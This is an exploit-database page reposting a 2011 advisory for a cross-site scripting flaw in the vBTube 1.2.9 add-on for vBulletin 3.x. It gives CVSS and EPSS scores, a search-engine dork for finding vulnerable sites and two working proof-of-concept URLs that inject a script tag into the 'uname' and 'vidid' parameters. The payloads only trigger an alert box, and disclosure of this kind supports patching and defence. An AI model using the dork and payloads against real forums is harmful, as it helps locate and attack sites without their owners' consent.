Advertisement






vBulletin 3.x.x vBTube 1.2.9 add-on Cross Site Scripting Vulnerability

CVE Category Price Severity
N/A CWE-79 Unknown Medium
Author Risk Exploitation Type Date
Unknown Medium Remote 2011-06-22
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 0.09129 0.88325

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2011060056

Below is a copy:

[~] Author : Mr.ThieF <~

[~] Contact : [email protected] <~

[~] DorK : inurl:vBTube 1.2.9

[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=173083

[~] Version : 3.x

[~] Exploit :

http://[site]/[path]/vBTube.php?page=1&do=user&uname="><script>alert(1);</script>
http://[site]/[path]/vBTube.php?do=view&vidid="><script>alert(1);</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
No GreeTz .. xX

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.